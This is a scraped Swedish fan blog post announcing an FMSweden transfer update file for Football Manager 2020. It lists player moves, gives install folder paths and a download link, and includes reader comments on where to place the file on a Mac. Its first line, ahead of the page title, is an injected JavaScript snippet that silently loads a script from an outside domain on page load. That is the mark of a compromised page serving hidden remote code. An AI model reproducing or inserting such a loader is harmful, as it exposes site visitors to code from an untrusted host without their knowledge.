;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ny FMSweden Update! – FMSweden
Meny Stäng

Ny FMSweden Update!

Torsdag och återigen bjuder FMSweden på en köttig FMSU med alla de senaste övergångarna! Det svenska transferfönstret har stängt vilket har lett till många intressanta övergångar. Här kommer ett axplock från det som hänt senaste veckan!

 • Pontus Wernbloom klar för IFK Göteborg
 • Mikael Lustig klar för AIK
 • Muamer Tankovic klar för Hammarby
 • Magnus Eriksson klar för Djurgården
 • Sebastian Eriksson klar för IFK Göteborg
 • Romain Gall klar för Örebro
 • Ben Chilwell klar för Chelsea
 • Pedro klar för Roma
 • Rodrigo klar för Leeds

Flera spelare har skrivit på nya kontrakt, Dean Henderson och Jamie Vardy för att nämna några. De italienska och spanska ligorna är nu färdigspelade och innehåller rätt klubb i rätt liga. En viss Leo Messi kommer att lämna Barcelona när hans kontrakt löper ut… ?

Detta och MYCKET mer finns med i senaste versionen utav FMSU!

Ladda ner filen gratis och placera den i:

PC: Mina dokument/Sports Interactive/Football Manager 2020/Editor Data
Mac: Bibliotek/Application/Sports Interactive/Football Manager 2020/Editor Data

http://www.mediafire.com/file/z2v1hcvrfi9m653/FMSU.fmf/file

Please wait...

Liknande Inlägg

17 kommentarer

 1. Claeshassan

  Fan nu får ni hjälpa mig, jag laddar ner filen. Men kan inte hitta “Football manager” mappen i “mina dokument” på min MAC.
  Hittar den enbart om jag söker via spootlight. Men om jag lägger filen där så kommer den inte in i spelet?

  Vet att jag hade detta problem förut men orkade inte bry mig, men nu är det så jävla mycket transfers osv som jag går miste om.

  Please, skriv ett privat mess till mig och förklara hur jag ska göra.

  Tack på förh(UD)and
  Claes Andersson

  • Peter Hecktor

   gå in via Steam, “högerklicka” på fm20, välj “hantera” sedan “Bläddra bland lokala filer” Då får du upp Finder där du kommer in i en mapp som heter “Football Manager 2020”. Högerklicka på mappnamnet (Football Manager 2020) högst upp, välj Application Support – Sports Interactive – Football Manager 2020 – Editor data och lägg in FMSU där. Starta sedan om spelet så kommer den upp som alternativ.

Lämna ett svar